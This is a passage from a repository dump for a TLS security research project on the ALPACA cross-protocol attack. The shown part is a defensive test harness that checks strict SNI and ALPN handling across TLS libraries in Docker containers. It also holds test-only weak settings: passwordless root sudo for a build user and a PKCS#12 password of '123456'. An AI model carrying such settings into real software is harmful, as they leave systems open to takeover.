├── evaluation-libraries ├── .gitignore ├── README.md ├── baseimage │ ├── Dockerfile │ ├── Dockerfile-archlinux │ ├── Dockerfile-debian │ ├── build.sh │ ├── certs │ │ └── generate-ca.sh │ └── client.sh ├── bearssl │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ ├── client.c │ │ └── client.h │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ ├── server.c │ │ └── server.h ├── botan │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ └── client.cpp │ ├── cmake │ │ └── FindBotan2.cmake │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ ├── server.cpp │ │ └── server.h ├── build-everything.sh ├── gnutls │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ ├── client.c │ │ ├── examples.h │ │ └── tcp.c │ ├── cmake │ │ ├── FindGnuTLS.cmake │ │ ├── FindPackageHandleStandardArgs.cmake │ │ └── FindPackageMessage.cmake │ ├── docker-compose.yml │ ├── readme.md │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ ├── server.c │ │ └── server.h ├── golang │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── client.go │ │ └── go.mod │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── go.mod │ │ └── server.go ├── java │ ├── Dockerfile │ ├── LICENSE-java-getopt │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── README.md │ │ ├── lib │ │ │ └── java-getopt-1.0.14.jar │ │ ├── manifest │ │ └── src │ │ │ └── Client.java │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── README.md │ │ ├── lib │ │ └── java-getopt-1.0.14.jar │ │ ├── manifest │ │ └── src │ │ └── Server.java ├── mbedtls │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ └── client.c │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ └── server.c ├── openssl │ ├── .gitignore │ ├── CMakeLists.txt │ ├── Dockerfile-boringssl │ ├── Dockerfile-openssl │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ ├── CMakeLists.txt │ │ ├── client.c │ │ └── client.h │ ├── docker-compose-boringssl.yml │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ ├── CMakeLists.txt │ │ ├── server.c │ │ └── server.h ├── run-everything.sh ├── rustls │ ├── Cargo.toml │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ │ └── client.rs │ ├── docker-compose.yml │ ├── run.sh │ └── server │ │ └── server.rs └── wolfssl │ ├── CMakeLists.txt │ ├── Dockerfile │ ├── LICENSE │ ├── README.md │ ├── build.sh │ ├── client │ ├── CMakeLists.txt │ ├── client.c │ └── client.h │ ├── docker-compose.yml │ ├── run.sh │ └── server │ ├── CMakeLists.txt │ ├── server.c │ └── server.h ├── evaluation-servers ├── .gitignore ├── README.md ├── apache │ ├── Dockerfile │ ├── apache.conf │ ├── build.sh │ ├── docker-compose.yml │ └── run.sh ├── build.sh ├── courier │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── imapd-ssl │ ├── run.sh │ ├── smtpd.conf │ └── start.sh ├── cyrus │ ├── Dockerfile │ ├── build.sh │ ├── cyrus.asc │ ├── cyrus.conf │ ├── docker-compose.yml │ ├── imapd.conf │ └── run.sh ├── dovecot │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ └── run.sh ├── exim │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── exim.conf │ └── run.sh ├── filezilla-server │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ └── run.sh ├── lighttpd │ ├── Dockerfile │ ├── Dockerfile-mbedtls │ ├── build.sh │ ├── docker-compose.yml │ ├── lighttpd-mbedtls.conf │ ├── lighttpd.conf │ └── run.sh ├── nginx │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── nginx.conf │ └── run.sh ├── opensmtpd │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── run.sh │ └── smtpd.conf ├── postfix │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── main.cf │ ├── master.cf │ └── run.sh ├── proftpd │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── proftpd.conf │ └── run.sh ├── pure-ftpd │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ └── run.sh ├── sendmail │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── run.sh │ └── start.sh └── vsftpd │ ├── Dockerfile │ ├── build.sh │ ├── docker-compose.yml │ ├── run.sh │ ├── start.sh │ └── vsftpd.conf ├── exploits ├── ftp │ ├── 01-pureftpd.md │ ├── 02-proftpd.md │ ├── 03-microsoft-ftp.md │ ├── 04-vsftpd.md │ ├── 05-filezilla.md │ └── 06-serv-u.md ├── imap │ ├── 01-dovecot.md │ ├── 02-courier.md │ ├── 03-exchange.md │ ├── 04-cyrus.md │ ├── 05-kerio-connect.md │ └── 06-zimbra.md ├── pop3 │ ├── 01-dovecot.md │ ├── 02-courier.md │ ├── 03-exchange.md │ ├── 04-cyrus.md │ ├── 05-kerio-connect.md │ └── 06-zimbra.md └── smtp │ ├── 01-postfix.md │ ├── 02-exim.md │ ├── 03-sendmail.md │ ├── 04-mailenable.md │ ├── 05-mdaemon.md │ └── 06-opensmtpd.md └── testlab ├── .gitignore ├── README.md ├── mitmproxy ├── main.py ├── proxy │ ├── __init__.py │ └── socket │ │ ├── __init__.py │ │ ├── mitmsocket.py │ │ └── protocols │ │ ├── __init__.py │ │ ├── ftp.py │ │ ├── imap.py │ │ ├── imaps.py │ │ ├── pop3.py │ │ ├── pop3s.py │ │ └── smtp.py └── utils │ ├── __init__.py │ ├── common.py │ ├── logging.py │ └── tls.py ├── scripts └── show_vsftp_log.sh ├── servers ├── docker-compose.yml └── files │ ├── ftp-proftpd │ ├── Dockerfile │ ├── bob │ │ └── payload.html │ ├── proftpd.conf │ └── tls.conf │ ├── ftp-vsftp │ ├── Dockerfile │ ├── payload.html │ └── vsftpd.conf │ ├── mail-courier │ ├── Dockerfile │ ├── entrypoint.sh │ └── mail.eml │ ├── mail-cyrus │ ├── Dockerfile │ ├── cyradm_commands │ ├── cyrus.conf │ ├── imapd.conf │ └── mails │ │ ├── 1.eml │ │ └── 2.eml │ ├── mail-sendmail │ ├── Dockerfile │ └── entrypoint.sh │ ├── nginx-attacker │ └── html │ │ ├── download │ │ ├── ftps.html │ │ ├── imap.html │ │ └── pop3.html │ │ ├── index.html │ │ ├── reflection │ │ ├── imap.html │ │ └── smtp.html │ │ └── upload │ │ ├── ftps.html │ │ └── imaps.html │ └── nginx-target │ └── html │ └── index.php └── setup.sh /evaluation-libraries/.gitignore: -------------------------------------------------------------------------------- 1 | *.vscode 2 | build/ 3 | java/client/bin/Client.class 4 | java/server/bin/Server.class 5 | -------------------------------------------------------------------------------- /evaluation-libraries/README.md: -------------------------------------------------------------------------------- 1 | # evaluation-libraries 2 | TLS-library examples with strict SNI and strict ALPN implemented to prevent the cross-protocol attacks demonstrated in the [ALPACA-Attack](https://alpaca-attack.com/index.html). 3 | 4 | DISCLAIMER: The implementations only focused on the ALPN&SNI TLS-Extensions, i can't guarantee that they are otherwise securely implemented. 5 | 6 | ## Containers 7 | Each library example starts the following containers 8 | - ``server`` with SNI=tls-server.com , ALPN=http/1.1 written in the library 9 | - ``server-openssl-wrong-cn`` with SNI=tls-server.com , ALPN=http/1.1 and a certificate that has a wrong common name 10 | - ``server-openssl-malicious-alpn`` with SNI=tls-server.com and always sends back ALPN=invalid 11 | - ``client`` runs a bash script that does the following tests 12 | 13 | ## Tests 14 | 1. send correct SNI and ALPN to ``server`` and send application data 15 | 2. send wrong SNI to ``server`` (tests SNI on server) 16 | 3. send wrong ALPN to ``server`` (tests ALPN on server) 17 | 4. send correct SNI and ALPN to ``server-openssl-wrong-cn`` (tests strict SNI on client) 18 | 5. send correct SNI and ALPN to ``server-openssl-malicious-alpn`` (tests strict ALPN on client) 19 | 20 | The first test needs to succeed and every other tests needs to return a non-null value. 21 | 22 | ## How to run 23 | Requires docker, docker-compose and easy-rsa 24 | 25 | This builds all containers, runs all test and puts the results in a file called ``results`` 26 | ``` 27 | ./run-everything.sh 28 | ``` 29 | 30 | ---------------- 31 | ### Running single libraries 32 | First build the baseimage and the openssl image. (The openssl image is required for tests 4 and 5) 33 | ``` 34 | cd baseimage && ./build.sh && cd .. 35 | cd openssl && ./build.sh && cd .. 36 | ``` 37 | 38 | Then go into any of the library folders and start the tests 39 | ``` 40 | ./run.sh 41 | ``` 42 | 43 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/Dockerfile: -------------------------------------------------------------------------------- 1 | ARG VERSION=3.15 2 | FROM alpine:${VERSION} 3 | RUN apk add \ 4 | git \ 5 | linux-headers \ 6 | cmake \ 7 | make \ 8 | wget \ 9 | bash \ 10 | autoconf \ 11 | automake \ 12 | coreutils \ 13 | patch \ 14 | gettext-dev \ 15 | gperf \ 16 | pkgconf \ 17 | libtool \ 18 | g++ \ 19 | gcc \ 20 | perl \ 21 | python3 \ 22 | go 23 | COPY ./certs/ca.crt /etc/ssl/certs/ 24 | COPY ./certs /etc/ssl/cert-data 25 | COPY client.sh /client.sh 26 | RUN mkdir /src 27 | RUN mkdir /build 28 | WORKDIR /src/ 29 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/Dockerfile-archlinux: -------------------------------------------------------------------------------- 1 | FROM archlinux:base-devel 2 | RUN pacman-key --init 3 | RUN pacman-key --populate archlinux 4 | RUN pacman -Syu --noconfirm 5 | RUN pacman -S git --noconfirm 6 | 7 | #create build user that has root access because archlinux doesn't allow makepkg to be run as root 8 | RUN useradd --no-create-home --shell=/bin/false build && usermod -L build 9 | RUN echo "build ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers 10 | RUN echo "root ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers 11 | 12 | COPY ./certs/ca.crt /etc/ssl/certs/ 13 | COPY ./certs /etc/ssl/cert-data 14 | COPY client.sh /client.sh 15 | RUN mkdir /src 16 | WORKDIR /src/ 17 | RUN chown build /src -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/Dockerfile-debian: -------------------------------------------------------------------------------- 1 | ARG VERSION=bullseye 2 | FROM debian:${VERSION} 3 | RUN apt-get update && apt-get install -y \ 4 | git \ 5 | cmake \ 6 | make \ 7 | wget \ 8 | bash \ 9 | autoconf \ 10 | automake \ 11 | coreutils \ 12 | patch \ 13 | gperf \ 14 | pkgconf \ 15 | libtool \ 16 | g++ \ 17 | gcc \ 18 | perl \ 19 | python3 \ 20 | golang 21 | COPY ./certs/ca.crt /etc/ssl/certs/ 22 | COPY ./certs /etc/ssl/cert-data 23 | COPY client.sh /client.sh 24 | RUN mkdir /src 25 | RUN mkdir /build 26 | WORKDIR /src/ 27 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/build.sh: -------------------------------------------------------------------------------- 1 | (cd certs 2 | ./generate-ca.sh); 3 | 4 | docker build -t tls-baseimage . 5 | docker build -t tls-baseimagedebian -f Dockerfile-debian . 6 | docker build -t tls-baseimage-archlinux -f Dockerfile-archlinux . 7 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/certs/generate-ca.sh: -------------------------------------------------------------------------------- 1 | DIR="`pwd`/`dirname "$0"`/" 2 | 3 | echo $DIR 4 | 5 | if [ "$OS" = "Darwin" ]; then 6 | brew install easy-rsa 7 | else 8 | apt-get install -y easy-rsa 9 | fi 10 | 11 | path="/usr/share/easy-rsa/" 12 | if [ "$OS" = "Darwin" ]; then 13 | path="" 14 | DIR_MAC="/usr/local/etc/" 15 | fi 16 | echo -e "${GREEN}[CERT] Creating PKI${NC}" 17 | ${path}easyrsa init-pki --pki-dir = "$DIR/pki" 18 | cat << EOF > "$DIR/pki/vars" 19 | set_var EASYRSA_DN "cn_only" 20 | set_var EASYRSA_DIGEST "sha512" 21 | set_var EASYRSA_BATCH "1" 22 | set_var EASYRSA_REQ_CN "alpaca.poc" 23 | EOF 24 | dd if=/dev/urandom of="$DIR/pki/.rnd" bs=256 count=1 2> /dev/null 25 | echo -e "${GREEN}[CERT] Build CA${NC}" 26 | ${path}easyrsa build-ca nopass 27 | 28 | echo -e "${GREEN}[CERT] Generating Certificates${NC}" 29 | ${path}easyrsa --req-cn="tls-server.com" gen-req tls-server.com nopass 30 | ${path}easyrsa sign-req server tls-server.com 31 | 32 | ${path}easyrsa --req-cn="wrong-cn.com" gen-req wrong-cn.com nopass 33 | ${path}easyrsa sign-req server wrong-cn.com 34 | 35 | #copy certs 36 | cp "$DIR/pki/issued/tls-server.com.crt" "$DIR" 37 | cp "$DIR/pki/private/tls-server.com.key" "$DIR" 38 | cp "$DIR/pki/issued/wrong-cn.com.crt" "$DIR" 39 | cp "$DIR/pki/private/wrong-cn.com.key" "$DIR" 40 | cp "$DIR/pki/ca.crt" "$DIR" 41 | 42 | #generate chains 43 | cat "$DIR/tls-server.com.crt" >> "$DIR/tls-server.com-chain.crt" 44 | cat "$DIR/ca.crt" >> "$DIR/tls-server.com-chain.crt" 45 | 46 | #generate chains 47 | cat "$DIR/wrong-cn.com.crt" >> "$DIR/wrong-cn.com-chain.crt" 48 | cat "$DIR/ca.crt" >> "$DIR/wrong-cn.com-chain.crt" 49 | 50 | #generate p12 51 | openssl pkcs12 -export -in "$DIR/tls-server.com.crt" -inkey "$DIR/tls-server.com.key" -out "$DIR/tls-server.com.p12" -password pass:123456 52 | openssl pkcs12 -export -in "$DIR/wrong-cn.com.crt" -inkey "$DIR/wrong-cn.com.key" -out "$DIR/wrong-cn.com.p12" -password pass:123456 53 | 54 | openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in tls-server.com.key -out tls-server.com.pkcs8.key 55 | openssl pkcs8 -topk8 -inform PEM -outform PEM -nocrypt -in wrong-cn.com.key -out wrong-cn.com.pkcs8.key 56 | 57 | #if [ "$OS" = "Darwin" ]; then 58 | # DIR_MAC="/usr/local/etc" 59 | #else 60 | # DIR_MAC=${DIR} 61 | #fi 62 | # 63 | #mkdir -p "$DIR/servers/files/cert/" 2> /dev/null 64 | #cp "$DIR_MAC/pki/issued/attacker.com.crt" "$DIR/servers/files/cert/" 65 | #cp "$DIR_MAC/pki/private/attacker.com.key" "$DIR/servers/files/cert/" 66 | # 67 | #${path}easyrsa --req-cn="target.com" gen-req target.com nopass 68 | #${path}easyrsa sign-req server target.com 69 | # 70 | #cp "$DIR_MAC/pki/issued/target.com.crt" "$DIR/servers/files/cert/" 71 | #cp "$DIR_MAC/pki/private/target.com.key" "$DIR/servers/files/cert/" 72 | -------------------------------------------------------------------------------- /evaluation-libraries/baseimage/client.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | #$1 command to run 3 | #$2 server1 to connect 4 | #$3 server2 to connect 5 | #$4 openssl-malicious-alpn server 6 | #$5 wait seconds before starting 7 | 8 | results=() 9 | 10 | sleep $5 11 | 12 | echo "------------ Test 1: SNI=tls-server.com ALPN=http/1.1 ------------------" 13 | $1 -h $2 -s tls-server.com -a http/1.1 14 | results+=($?) 15 | 16 | echo "------------ Test 2: SNI=example.com ALPN=http/1.1 ------------------" 17 | /openssl-client -h $2 -s example.com -a http/1.1 18 | results+=($?) 19 | 20 | echo "------------ Test 3: SNI=tls-server.com ALPN=invalid ------------------" 21 | /openssl-client -h $2 -s tls-server.com -a invalid 22 | results+=($?) 23 | 24 | echo "------------ Test 4: wrong certificate by server ------------------" 25 | $1 -h $3 -s tls-server.com -a http/1.1 26 | results+=($?) 27 | 28 | echo "------------ Test 5: server sends wrong alpn ------------------" 29 | $1 -h $4 -s tls-server.com -a http/1.1 30 | results+=($?) 31 | 32 | RED='\033[0;31m ' 33 | GREEN='\033[0;32m ' 34 | NC='\033[0m' # No Color 35 | 36 | echo "" > results 37 | 38 | for i in "${!results[@]}"; do 39 | test=$((i+1)) 40 | if [ $i = "0" ]; then #first test needs to return 0 41 | if [ ${results[$i]} = "0" ]; 42 | then 43 | echo -e "${GREEN}Test$test success! exitcode:${results[$i]}" >> results; 44 | else 45 | echo -e "${RED}Test$test FAILED! exitcode:${results[$i]}" >> results; 46 | fi 47 | else #every other test needs to return non-zero value 48 | if [ ${results[$i]} = "0" ]; 49 | then 50 | echo -e "${RED}Test$test FAILED! exitcode:${results[$i]}" >> results; 51 | else 52 | echo -e "${GREEN}Test$test success! exitcode:${results[$i]}" >> results; 53 | fi 54 | fi 55 | done 56 | 57 | cat results -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-bearssl VERSION 0.1.0) 3 | 4 | 5 | 6 | add_subdirectory(client) 7 | add_subdirectory(server) 8 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-openssl as tls-bearssl 3 | ARG VERSION=0.6 4 | 5 | RUN apk add sed 6 | 7 | WORKDIR /build 8 | RUN git clone --depth=1 --branch=v${VERSION} https://www.bearssl.org/git/BearSSL 9 | WORKDIR /build/BearSSL 10 | RUN make 11 | 12 | 13 | 14 | 15 | WORKDIR /build 16 | ADD server /build/server 17 | ADD client /build/client 18 | ADD CMakeLists.txt /build/CMakeLists.txt 19 | 20 | # generate c code from private keys and certs 21 | RUN ls /build/server/ 22 | RUN /build/BearSSL/build/brssl ta /etc/ssl/cert-data/ca.crt | tail -n +2 >> /build/client/client.h 23 | RUN /build/BearSSL/build/brssl chain /etc/ssl/cert-data/tls-server.com-chain.crt | tail -n +2 >> /build/server/server.h 24 | RUN /build/BearSSL/build/brssl skey -C /etc/ssl/cert-data/tls-server.com.key | tail -n +2 >> /build/server/server.h 25 | 26 | # wrong-cn.com key&cert need different variable names 27 | RUN /build/BearSSL/build/brssl chain /etc/ssl/cert-data/wrong-cn.com-chain.crt | tail -n +2 | sed "s/\(\(CERT[01]\)\|\(CHAIN\(_LEN\)\?\)\|\(RSA\(_[DIPQ]\*\)\?\)\)/WRONG_\1/g" >> /build/server/server.h 28 | RUN /build/BearSSL/build/brssl skey -C /etc/ssl/cert-data/wrong-cn.com.key | tail -n +2 | sed "s/\(\(CERT[01]\)\|\(CHAIN\(_LEN\)\?\)\|\(RSA\(_[DIPQ]\*\)\?\)\)/WRONG_\1/g" >> /build/server/server.h 29 | 30 | 31 | RUN cmake . .. && make 32 | RUN mv /build/server/server / 33 | RUN mv /build/client/client / 34 | COPY --from=tls-openssl /openssl-client /openssl-client 35 | 36 | 37 | WORKDIR / 38 | CMD ["/server"] -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (c) 2016 Thomas Pornin 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining 4 | a copy of this software and associated documentation files (the 5 | "Software"), to deal in the Software without restriction, including 6 | without limitation the rights to use, copy, modify, merge, publish, 7 | distribute, sublicense, and/or sell copies of the Software, and to 8 | permit persons to whom the Software is furnished to do so, subject to 9 | the following conditions: 10 | 11 | The above copyright notice and this permission notice shall be 12 | included in all copies or substantial portions of the Software. 13 | 14 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 15 | EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 16 | MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 17 | NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS 18 | BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN 19 | ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 20 | CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/README.md: -------------------------------------------------------------------------------- 1 | # bearssl example with strict sni and strict alpn 2 | 3 | Tested with bearSSL 0.6 4 | 5 | needs tls-baseimage already in docker 6 | 7 | Based on BearSSL/tools/server.c and client.c 8 | 9 | ```bash 10 | ./run.sh 11 | ``` 12 | 13 | 14 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/build.sh: -------------------------------------------------------------------------------- 1 | docker build --build-arg VERSION=0.6 . -t tls-bearssl -f Dockerfile 2 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/client/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(client VERSION 0.1.0) 3 | 4 | #include_directories(${CMAKE_SOURCE_DIR}/BearSSL/inc) 5 | add_library(brssl STATIC IMPORTED) 6 | set_target_properties(brssl PROPERTIES 7 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/BearSSL/build/libbearssl.a" 8 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/BearSSL/inc" 9 | ) 10 | add_executable(client client.c) 11 | target_link_libraries(client brssl) 12 | target_compile_options(client PRIVATE -Wall -Wextra) 13 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/client/client.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2016 Thomas Pornin 3 | * 4 | * Permission is hereby granted, free of charge, to any person obtaining 5 | * a copy of this software and associated documentation files (the 6 | * "Software"), to deal in the Software without restriction, including 7 | * without limitation the rights to use, copy, modify, merge, publish, 8 | * distribute, sublicense, and/or sell copies of the Software, and to 9 | * permit persons to whom the Software is furnished to do so, subject to 10 | * the following conditions: 11 | * 12 | * The above copyright notice and this permission notice shall be 13 | * included in all copies or substantial portions of the Software. 14 | * 15 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 16 | * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 17 | * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 18 | * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS 19 | * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN 20 | * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN 21 | * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 22 | * SOFTWARE. 23 | */ 24 | 25 | #include 26 | #include 27 | #include 28 | #include 29 | #include 30 | #include 31 | #include 32 | #include 33 | #include 34 | #include 35 | #include 36 | #include 37 | 38 | 39 | /* 40 | * Connect to the specified host and port. The connected socket is 41 | * returned, or -1 on error. 42 | */ 43 | static int 44 | host_connect(const char *host, const char *port) { 45 | struct addrinfo hints, *si, *p; 46 | int fd; 47 | int err; 48 | 49 | memset(&hints, 0, sizeof hints); 50 | hints.ai_family = PF_UNSPEC; 51 | hints.ai_socktype = SOCK_STREAM; 52 | err = getaddrinfo(host, port, &hints, &si); 53 | if (err != 0) { 54 | fprintf(stderr, "ERROR: getaddrinfo(): %s\n", 55 | gai_strerror(err)); 56 | return -1; 57 | } 58 | fd = -1; 59 | for (p = si; p != NULL; p = p->ai_next) { 60 | struct sockaddr *sa; 61 | void *addr; 62 | char tmp[INET6_ADDRSTRLEN + 50]; 63 | 64 | sa = (struct sockaddr *)p->ai_addr; 65 | if (sa->sa_family == AF_INET) { 66 | addr = &((struct sockaddr_in *)sa)->sin_addr; 67 | } else if (sa->sa_family == AF_INET6) { 68 | addr = &((struct sockaddr_in6 *)sa)->sin6_addr; 69 | } else { 70 | addr = NULL; 71 | } 72 | if (addr != NULL) { 73 | inet_ntop(p->ai_family, addr, tmp, sizeof tmp); 74 | } else { 75 | sprintf(tmp, "", 76 | (int)sa->sa_family); 77 | } 78 | //fprintf(stderr, "connecting to: %s\n", tmp); 79 | fd = socket(p->ai_family, p->ai_socktype, p->ai_protocol); 80 | if (fd < 0) { 81 | perror("socket()"); 82 | continue; 83 | } 84 | if (connect(fd, p->ai_addr, p->ai_addrlen) < 0) { 85 | perror("connect()"); 86 | close(fd); 87 | continue; 88 | } 89 | break; 90 | } 91 | if (p == NULL) { 92 | freeaddrinfo(si); 93 | fprintf(stderr, "ERROR: failed to connect\n"); 94 | return -1; 95 | } 96 | freeaddrinfo(si); 97 | //fprintf(stderr, "connected.\n"); 98 | return fd; 99 | } 100 | 101 | /* 102 | * Low-level data read callback for the simplified SSL I/O API. 103 | */ 104 | static int 105 | sock_read(void *ctx, unsigned char *buf, size_t len) { 106 | for (;;) { 107 | ssize_t rlen; 108 | 109 | rlen = read(*(int *)ctx, buf, len); 110 | if (rlen <= 0) { 111 | if (rlen < 0 && errno == EINTR) { 112 | continue; 113 | } 114 | return -1; 115 | } 116 | return (int)rlen; 117 | } 118 | } 119 | 120 | /* 121 | * Low-level data write callback for the simplified SSL I/O API. 122 | */ 123 | static int 124 | sock_write(void *ctx, const unsigned char *buf, size_t len) { 125 | for (;;) { 126 | ssize_t wlen; 127 | 128 | wlen = write(*(int *)ctx, buf, len); 129 | if (wlen <= 0) { 130 | if (wlen < 0 && errno == EINTR) { 131 | continue; 132 | } 133 | return -1; 134 | } 135 | return (int)wlen; 136 | } 137 | } -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | networks: 3 | default: 4 | name: tls-network 5 | internal: true 6 | services: 7 | bearssl-server: 8 | image: tls-bearssl 9 | openssl-server-wrong-cn: 10 | image: tls-openssl 11 | command: [ "/openssl-server", "-k", "/etc/ssl/cert-data/wrong-cn.com.key", "-c" , "/etc/ssl/cert-data/wrong-cn.com-chain.crt"] 12 | openssl-malicious-alpn: 13 | image: tls-openssl 14 | command: [ "/openssl-server", "-m"] 15 | bearssl-client: 16 | image: tls-bearssl 17 | command: [ "./client.sh", "/client", "bearssl-server", "openssl-server-wrong-cn", "openssl-malicious-alpn" ,"1"] 18 | depends_on: 19 | - bearssl-server 20 | - openssl-server-wrong-cn 21 | - openssl-malicious-alpn 22 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/run.sh: -------------------------------------------------------------------------------- 1 | ./build.sh 2 | docker-compose up --abort-on-container-exit --exit-code-from bearssl-client --remove-orphans 3 | -------------------------------------------------------------------------------- /evaluation-libraries/bearssl/server/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(server VERSION 0.1.0) 3 | 4 | #include_directories(${CMAKE_SOURCE_DIR}/BearSSL/inc) 5 | add_library(brssl STATIC IMPORTED) 6 | set_target_properties(brssl PROPERTIES 7 | IMPORTED_LOCATION "${CMAKE_SOURCE_DIR}/BearSSL/build/libbearssl.a" 8 | INTERFACE_INCLUDE_DIRECTORIES "${CMAKE_SOURCE_DIR}/BearSSL/inc" 9 | ) 10 | add_executable(server server.c) 11 | target_link_libraries(server brssl) 12 | target_compile_options(server PRIVATE -Wall -Wextra) -------------------------------------------------------------------------------- /evaluation-libraries/botan/CMakeLists.txt: -------------------------------------------------------------------------------- 1 | cmake_minimum_required(VERSION 3.0.0) 2 | project(alpaca-botan VERSION 0.1.0) 3 | 4 | 5 | set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} ${CMAKE_CURRENT_SOURCE_DIR}/cmake) 6 | include(CMakeToolsHelpers OPTIONAL) 7 | include(FeatureSummary) 8 | 9 | include(CheckCCompilerFlag) 10 | include(CheckCXXCompilerFlag) 11 | include(CheckCXXSourceCompiles) 12 | 13 | 14 | 15 | add_subdirectory(client) 16 | add_subdirectory(server) -------------------------------------------------------------------------------- /evaluation-libraries/botan/Dockerfile: -------------------------------------------------------------------------------- 1 | # syntax=docker/dockerfile:1 2 | FROM tls-baseimage as tls-botan 3 | ARG VERSION=2.18.1 4 | RUN wget https://botan.randombit.net/releases/Botan-${VERSION}.tar.xz 5 | RUN tar -xf Botan-${VERSION}.tar.xz 6 | WORKDIR /src/Botan-${VERSION} 7 | RUN apk add python2 8 | RUN ./configure.py --prefix=/build/ 9 | RUN make 10 | RUN make install 11 | RUN mv libbotan-2.a /lib/libbotan-2.a 12 | RUN mv /build/include/* /usr/include/ 13 | 14 | ADD cmake /build/cmake 15 | ADD server /build/server 16 | ADD client /build/client 17 | ADD CMakeLists.txt /build/CMakeLists.txt 18 | WORKDIR /build 19 | RUN cmake . .. && make 20 | RUN mv /build/server/server / 21 | RUN mv /build/client/client / 22 | COPY --from=tls-openssl /openssl-client /openssl-client 23 | WORKDIR / 24 | CMD ["/server"] 25 | -------------------------------------------------------------------------------- /evaluation-libraries/botan/LICENSE: -------------------------------------------------------------------------------- 1 | Copyright (C) 1999-2021 The Botan Authors 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, 8 | this list of conditions, and the following disclaimer. 9 | 10 | 2. Redistributions in binary form must reproduce the above copyright 11 | notice, this list of conditions, and the following disclaimer in the 12 | documentation and/or other materials provided with the distribution. 13 | 14 | THIS SOFTWARE IS PROVIDED BY 